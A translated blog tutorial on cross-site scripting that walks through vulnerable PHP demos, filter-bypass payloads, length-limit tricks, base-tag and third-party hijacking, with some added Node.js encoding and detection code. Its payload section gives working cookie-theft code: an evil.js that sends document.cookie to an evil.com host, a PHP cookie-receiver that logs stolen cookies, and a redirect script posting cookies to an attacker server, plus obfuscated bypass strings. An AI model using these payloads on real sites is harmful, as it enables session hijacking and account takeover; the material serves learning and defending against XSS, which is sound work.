Someone once said that XSS is so popular because every website, Google and Microsoft included, has had an XSS vulnerability at some point! Until now I only had a superficial understanding of this piece of "fat", with no systematic study, so I am taking advantage of the summer vacation to analyze it systematically.
0x01 XSS Basics
- Cross Site Script
- Targets the Web client
- Delivered via JS/ActiveX/Flash ...
JS XSS usage scenarios
- Embedded HTML directly:
<script>alert(/xss/);</script>
- Element tag event:
<body onload=alert(/xss/)>
- Picture tags:
- Other tags:
<iframe>, <div>, and <link>
- DOM object: tampering with page content
XSS can be divided into the following categories depending on the effect:
- Reflected XSS
- Stored XSS
- DOM Based XSS, formed by modifying DOM nodes
Ease of exploitation: 2>3>1
```php
<?php
/*
 * Reflected XSS demo
 */
error_reporting(0);
$text = $_GET['name'];
?>
<input type="text" id="text" value="<?php echo $text ?>" />
```
Payload: ?name=">
```php
<?php
/*
 * Stored XSS demo
 */
error_reporting(7);
$name = $_GET['name'];
$conn = mysql_connect("127.0.0.1", "root", "5688");
mysql_select_db("test", $conn);
mysql_query('set names "utf8"');
// the value is written to the database unfiltered ...
$sql_insert = "insert into liuyan(content) values('$name')";
$result = mysql_query($sql_insert, $conn);
// ... and echoed back unencoded on every later visit
$sql_select = "select * from liuyan";
$results = mysql_fetch_array(mysql_query($sql_select));
echo $results['content'];
?>
```
Step 1: ?name=<scRipt>Alert(1)</scrIpt>
Step 2: result
```php
<?php
/*
 * DOM Based XSS demo
 */
error_reporting(0);
$name = $_GET['name'];
?>
<input id="text" type="text" value="<?php echo $name ?>" />
<div id="print"></div>
<script>
var text = document.getElementById('text');
var print = document.getElementById('print');
// client-side sink: the input value is parsed as HTML
print.innerHTML = text.value;
</script>
```
Payload: ?name=
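The fix for the three demos is to encode output for the context it lands in, and for the DOM demo to write with textContent rather than innerHTML, instead of trying to filter input. This is an added example in Node.js, not the page's PHP or the author's code; renderInput() and countTagStarts() are helpers assumed here that reproduce the demo's <input> markup and check it.

```javascript
// Encode a value for HTML text and double-quoted attribute contexts.
function encodeForHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, function (c) { return map[c]; });
}

// Server-side rendering of the demo's <input> (assumed helper, not the page's PHP):
// the only change from the vulnerable version is encoding before interpolation.
function renderInput(name) {
  return '<input type="text" id="text" value="' + encodeForHtml(name) + '" />';
}

// Check: well-formed output has exactly one tag start, the <input itself.
// A payload that breaks out of the attribute adds more.
function countTagStarts(markup) {
  return (markup.match(/</g) || []).length;
}

// The DOM demo's sink is print.innerHTML = text.value. Assigning to
// textContent writes the string as text and never parses it as markup;
// in the browser the fix is the one-line change print.textContent = text.value.
function copyToPrint(printNode, value) {
  printNode.textContent = value;
  return printNode.textContent;
}

// Constructed sample input: the breakout payload from the reflected demo.
const SAMPLE = '"><script>alert(/xss/)</script>';

console.log('vulnerable:', '<input type="text" id="text" value="' + SAMPLE + '" />');
console.log('encoded:   ', renderInput(SAMPLE));
```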
0x02 XSS Payload
After an XSS attack succeeds, the attacker controls the user's browser by implanting a malicious script in the page the user is currently viewing. These malicious scripts are known as the "XSS Payload".
Cookie Hijacking
```
http://www.a.com/test.php?abc="><script src=http://evil.com/evil.js></script>
```
evil.js content:
```javascript
var img = document.createElement("img");
img.src = "http://www.evil.com/log?" + escape(document.cookie);
document.body.appendChild(img);
```
PS: the log endpoint does not have to exist, because the request is recorded in the server's access log anyway.
This is the basic process of hijacking cookies with XSS. Once you have the user's cookie, how do you use it to log into the server? There are a number of methods; two of them are:
- Burp Suite proxy: modify the Cookie header
- Firefox plugin Tamper Data: intercept the request and modify the Cookie
PHP XSS cookie receiver
```php
<?php
$cookie = $_GET['c'];
$ip = getenv('REMOTE_ADDR');
$time = date("j F, Y, g:i a");
$referer = getenv('HTTP_REFERER');
$fp = fopen('cookie.txt', 'a');
fwrite($fp, 'Cookie: ' . $cookie . '<br/> IP: ' . $ip . '<br> Date and Time: ' . $time . '<br>Referer: ' . $referer . '<br><br>');
fclose($fp);
?>
```
Save the above to your own server as 1.php.
Then write the XSS:
```html
<script>document.location="http://your server/1.php?c="+document.cookie;</script>
```
- Constructing GET and POST requests
- XSS phishing
- Identifying the user's browser
- Identifying software installed by the user
- CSS History Hack
- Getting the user's real IP
0x03 XSS attack platforms
- Attack API
- BeEF
- Xss-proxy
0x04 XSS worm
0x05 XSS construction tips
The most basic construction technique is "closing the tag".
Using character encoding
The first thing to mention here is the situation described by the author of "White Hat Talks Web Security": when the web page is encoded as GBK/GB2312, "%c1\" can be used to bypass the system's escaping ...
Next come the various encodings:
URL encoding, Unicode encoding, HTML encoding
HTML encoding exists to separate a character's representation in the source from its display, so that special characters do not cause parse errors. Named entities have the form & followed by a name (the Greek letters, for example); character references are &# followed by the decimal, or hexadecimal, ASCII or Unicode code point. The browser first decodes the HTML encoding and then renders. There is a premise, however: the encoded text must sit in a "value", such as the value of the src attribute; src itself cannot be HTML-encoded, otherwise the browser will not render properly.
```html
<img src=logo.png/>
```
CSS encoding
A backslash followed by 1 to 6 hexadecimal digits
Common ways to bypass
```html
<sCript>alert(1)</scRipt>
<script%20src%3D"http%3A%2F%2F0300.0250.0000.0001"><%2Fscript>
<scr<script>rip>alalertert</scr</script>rip>    (relies on the WAF's filtering being incomplete)
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</script>
```
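The bypass list above works against checks that match the raw input; a detector that first peels the URL and HTML encoding layers described in the character-encoding section and only then matches, case-insensitively, handles them. This is an added example in Node.js, not part of the original post; the NAMED table and RULES list are my own coarse assumptions, and the samples are constructed from this page's bypass, encoding and length-limit sections.

```javascript
// Named entities this demo decodes (assumed subset; a full table is much larger).
const NAMED = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'" };

// Decode HTML character references: &name; &#DDD; &#xHH; (trailing ; optional, as
// browsers accept). Unknown names and out-of-range code points are left untouched.
function decodeHtmlEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);?/gi, function (m, body) {
    if (body[0] !== '#') return NAMED[body.toLowerCase()] || m;
    const cp = /^#x/i.test(body) ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
    return cp <= 0x10FFFF ? String.fromCodePoint(cp) : m;
  });
}

// Percent-decode; keep the input as-is when it is malformed.
function decodeUrl(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// Peel URL and HTML layers (bounded, since they can be nested), then lowercase
// and collapse whitespace so case and spacing tricks no longer matter.
function normalize(input) {
  let cur = String(input), prev = null;
  for (let i = 0; i < 3 && cur !== prev; i++) {
    prev = cur;
    cur = decodeHtmlEntities(decodeUrl(cur));
  }
  return cur.toLowerCase().replace(/\s+/g, ' ');
}

// Coarse rules evaluated on the normalized form; tune them for the application.
const RULES = [/<\s*script\b/, /\bon[a-z]+\s*=/, /string\.fromcharcode/, /javascript\s*:/];

function looksLikeXss(input) {
  const n = normalize(input);
  return RULES.some(function (r) { return r.test(n); });
}

// The kind of check the list above defeats: exact, case-sensitive substring match.
function naiveCheck(input) {
  return input.indexOf('<script>') !== -1;
}

// Constructed samples: two from the bypass list, one HTML-encoded per the encoding
// section, and the location.hash payload from the length-limit section below.
const SAMPLES = [
  '<sCript>alert(1)</scRipt>',
  '<script%20src%3D"http%3A%2F%2F0300.0250.0000.0001"><%2Fscript>',
  '&#106;ava&#x73;cript:alert(1)',
  '" onclick="eval(location.hash.substr(1))'
];
```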
Bypassing length limits
```html
<input type="text" value="$var" />
```
with the constraint length($var) <= 20
Method one: shorten the payload by using events
Method two: use location.hash to load the XSS payload
Payload: " onclick="eval(location.hash.substr(1))
```html
<input type="text" value="" onclick="eval(location.hash.substr(1))" />
```
The first character of location.hash is #, so http://www.a.com/test.html#alert(1) takes effect. location.hash itself has no length limit; the browser's URL does, and anything within that range works.
Method three: use comment characters to bypass the length limit
If there are two input boxes, the first with a length limit and the second without, the part between the two boxes can be bridged with comment characters:
```html
input1#value: "><!--
input2#value: --><script>alert(/xss/);</script>
```
Using the <base> tag
The role of the <base> tag in HTML is to supply the base address for every link on the page that uses a relative path.
This can be exploited: if you can insert a base tag somewhere on the page, and on your own server host resources at the corresponding relative paths (an image, for instance) carrying the payload, the attack takes effect.
```html
<base href="http://www.evil.com/" />
```
The magic of window.name
It can be used to pass data across domains.
In a.com:
```javascript
window.name=test
location.href="http://www.b.com/xss.php"
```
In b.com, reading document.domain + window.name is enough to carry the data from a to b.
0x06 Some clever attack tactics
Third-party hijacking (off-site JS/CSS)
Simply put: look at which external sites' js/css/swf and so on your target site references, compromise the corresponding external site, and then modify that js/css/swf to achieve XSS on the target. This is a "roundabout" infiltration pattern.
Here is a snippet credited to "long short" that finds the off-site JS/CSS a page loads:
```javascript
for (var i = 0, tags = document.querySelectorAll('iframe[src],frame[src],script[src],link[rel=stylesheet],object[data],embed[src]'), tag; tag = tags[i]; i++) {
    var a = document.createElement('a');
    a.href = tag.src || tag.href || tag.data;
    if (a.hostname != location.hostname) {
        console.warn(location.hostname + ' 发现第三方资源[' + tag.localName + ']:' + a.href);
    }
}
```
Just run this code in the browser console.
0x07 XSS in JavaScript development frameworks
jQuery
jQuery's html() method reads the innerHTML of a DOM node when called without an argument, and writes the argument's value into the node's innerHTML when called with one. The latter can produce "DOM Based XSS":
```javascript
$('div.demo-container').html("...");
```
In addition, some other frameworks, such as Dojo and YUI, have had XSS vulnerabilities of their own.
Https://www.ohlinge.cn/web/xss.html
Learning the basics of XSS through code.